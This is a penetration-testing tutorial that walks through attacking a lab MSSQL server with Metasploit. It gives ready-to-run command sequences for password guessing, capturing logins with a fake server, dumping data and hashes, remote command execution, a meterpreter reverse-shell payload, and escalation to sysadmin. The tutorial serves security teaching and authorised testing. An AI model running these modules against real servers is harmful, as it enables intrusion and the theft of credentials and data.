MSSQL for Pentester: Metasploit
In this article, we will learn in detail how to pentest MSSQL servers using the Metasploit framework.
Table of content
- Information Gathering & Enumeration
- Locating MSSQL Server
- Password Cracking
- Retrieving MSSQL version
- MSSQL Enumeration
- SQL Users Enumeration
- Capturing MSSQL login
- Creating Database
- Dumping Database
- Command Exceution
- CLR Assembely
- Privilege Escalation
- Public to Sysadmin
Metasploit is an excellent framework developed by H. D. Moore. It is a free and lightweight tool for penetration testing. It is open-source and cross-platform and has a range of features. Its popularity rests primarily on the fact that it is a powerful tool for auditing security. While this is true, it also has many features that can help people protect themselves. Personally speaking, this is my go-to tool for testing as it encapsulates the exploit a pentester can ever need. Through this article, we will learn how to use Metasploit to exploit MSSQL. Therefore, we will go through every exploit Metasploit has to offer step by step, from finding the MSSQL server in the network to retrieving the sensitive information from the database and gaining control. Without any further ado, let us begin.
Information Gathering & Enumeration
Locating MSSQL Server
When testing MSSQL servers, whether remotely or locally, our first requirement is to find the server in the network. And for this, we will use the following exploit in Metasploit:
use auxiliary/scanner/mssql/mssql_ping set rhosts 192.168.1.1/24 exploit
We have found the server, so our next step is to retrieve the credentials of the server. We will enforce a dictionary attack for this, with the help of the following exploit:
use auxiliary/scanner/mssql/mssql_login set rhosts 192.168.1.3 set user_file /root/users.txt set verbose false exploit
And you can see in the image above, we have the credentials.
Retrieving MSSQL version
We can also get all the information about the MSSQL server and its version with the help of the following exploit:
use auxiliary/admin/mssql/mssql_sql set rhosts 192.168.1.3 set username lowprwiv set password Password@1 exploit
Let’s now enumerate the server and see what all information we can get. And for this, we will use the following exploit:
use auxiliary/admin/mssql/mssql_enum set rhosts 192.168.1.3 set username lowpriv set password Password@1 exploit
As the result of the above exploit, you can see what permissions are given to the database, which logins are available with other helpful information. The same can be seen in the image above.
SQL Users Enumeration
We can also find the proper login list of all the users on the server. Metasploit provides us with a particular exploit for just this task. And the exploit is the following:
use auxiliary/admin/mssql/mssql_enum_sql_login set rhosts 192.168.1.3 set username lowpriv set password Password@1 exploit
And as a result, you can see in the above image that the list of all users will be provided to you.
Capturing MSSQL login
The next exploit that we are going to use capture/mssql. This exploit creates a fake server and tries to capture the authenticated credentials from the original server. To use this exploit, type;
use auxiliary/server/capture/mssql set srvhost 192.168.1.2 exploit
Now, if the user tries to log in to the server, for instance, we will have the credentials with the following command:
sqsh -S 192.168.1.2 -U sa -P "password@1"
And when you check your Metasploit, voila! You will have the correct login credentials of the server, which you can see in the image below as well:
Usually, any MSSQL server that you are pentesting will have a database. But as the server on which we are performing this penetration testing is new as we also wanted to show the lab setup; therefore, for our next exploit to work, we will be creating a database in our server. To make the database, use the following command:
create database bank;
As the above query execute itself successfully, our next step is to type in the following query:
CREATE TABLE Customers ( CustomerID int, LastName varchar(255), FirstName varchar(255), passw varchar(255), creditcard varchar(255) );
And so, as you can see in the image above, our table is created. Now, let’s add data to our table with the help of the following query:
INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard) VALUES ('01', 'Technologies','Ignite', 'admin123', '1111-2222-3333-4444'); INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard) VALUES ('02', 'Sharma','Nisha', 'admin1234', '5555-6666-7777-8888'); INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard) VALUES ('03', 'Chandel','Raj', 'admin12345', '9999-1010-1020-1030'); INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard) VALUES ('04', 'Madan','Geet', 'admin12311', '1234-5678-9012-3456');
This way, you can create your database.
Now that we have our database, let us learn how we can dump the content of the database with the help of Metasploit. Luckily, Metasploit has a particular exploit dedicated to dumping the content of the database. And to use the said exploit type:
use auxiliary/admin/mssql/mssql_findandsampledata set rhosts 192.168.1.3 set username lowpriv set password Password@1 set sample_size 4 set keywords FirstName|passw|credit exploit
Thus, using the above exploit will give the desired content of the database. For instance, the data we dumped had the information of the stored credit cards of the users.
The next exploit that we are going to use will dumb the schema of the server. And to use this exploit, use the following set of commands:
use auxiliary/scanner/mssql/mssql_schemadump set rhosts 192.168.1.3 set username lowpriv set password Password@1 exploit
And so, with the help of the above exploit, we have the data from the server.
Last but not least, our next exploit is used to dump the hashes of the users from the server. To use this exploit, type:
use auxiliary/scanner/mssql/mssql_hashdump set rhosts 192.168.1.149 set username sa set password Password@1 expoit
We found the MSSQL server in the network, retrieved the credentials, impersonated the user to have higher privileges. So now, let us try and get a meterpreter session of the server by exploit xp_cmdshell by using the following exploit:
use exploit/windows/mssql/mssql_payload set rhosts 192.168.1.3 set username lowpriv set password Password@1 exploit
As you can see in the above image, the exploit is trying to enable the xp_cmdshell to have our session. We have written a detailed article on xp_cmdshell, which you can read here. Once the xp_cmdshel is successfully enabled, we will have our meterpreter session as shown in the image below:
Now, if we want to execute a command on the server, we can do that remotely with the help of Metasploit’s following exploit:
use auxiliary/admin/mssql/mssql_exec set rhosts 192.168.1.3 set username lowpriv set password Password@1 set cmd "net user" exploit
And as you can see in the image above, the exploit is executed successfully, and we have our desired result, i.e., the list of all the net users.
Another method to execute the desired command is to first write the command in .sql file with the following command:
cat user.sql CREATE LOGIN test1 WITH PASSWORD = 'Password@1';
Now we can use this .sql to run on the server, remotely, with the help of the following exploit:
use auxiliary/admin/mssql/mssql_sql_file set rhosts 192.168.1.3 set username lowpriv set password Password@1 set sql_file /root/user.sql exploit
And as a result, the above exploit will create a user with the name of test1. You can manually go to the server and confirm the creation of the user as shown in the image below:
The next exploit will help to take advantage of the CLR integration. This exploit will enable CLR integration, and along with that, it will also activate the trustworthy database property. After the exploit gives you the session, it restores all the settings to their original form. To use this exploit, type:
use exploit/windows/mssql/mssql_clr_payload set payload windows/x64/meterpreter/reverse_tcp set username lowpriv set password Password@1 exploit
And as you can see, the exploit followed all the steps to exploit CLR integration to our potential. And it gives out the meterpreter session as shown in the image above.
Public to Sysadmin
Now that we have the user’s credentials, we can use the following exploit escalate privileges for our user. This exploit will manipulate the trustworthy property of the database and give you all the privileges you desire. And for this, we will use the following exploit:
use auxiliary/admin/mssql/mssql_escalate_dbowner set rhosts 192.168.1.3 set username lowpriv set password Password@1 exploit
Note: To deeply understand the working of this exploit, read our other article here.
As you can see above, we got sysadmin privileges for our user.
Another method to gain privileges is by impersonating another user. And the following exploit will help us do precisely that; it will let our user impersonate other users to gain sysadmin privilege. To use this exploit, use the following set of commands:
use auxiliary/admin/mssql/mssql_escalate_execute_as set rhosts 192.168.1.3 set username lowpriv set password Password@1 exploit
Now, as you can see in the image above, the lowpriv user can impersonate sa user. Sa user is a member of sysadmin, and with the help of the above exploit, lowpriv is now a sysadmin too, as it impersonated sa user.
All in all, Metasploit is one of the best tools to pentest MSSQL servers as it offers so many exploits and multiple ways to do so.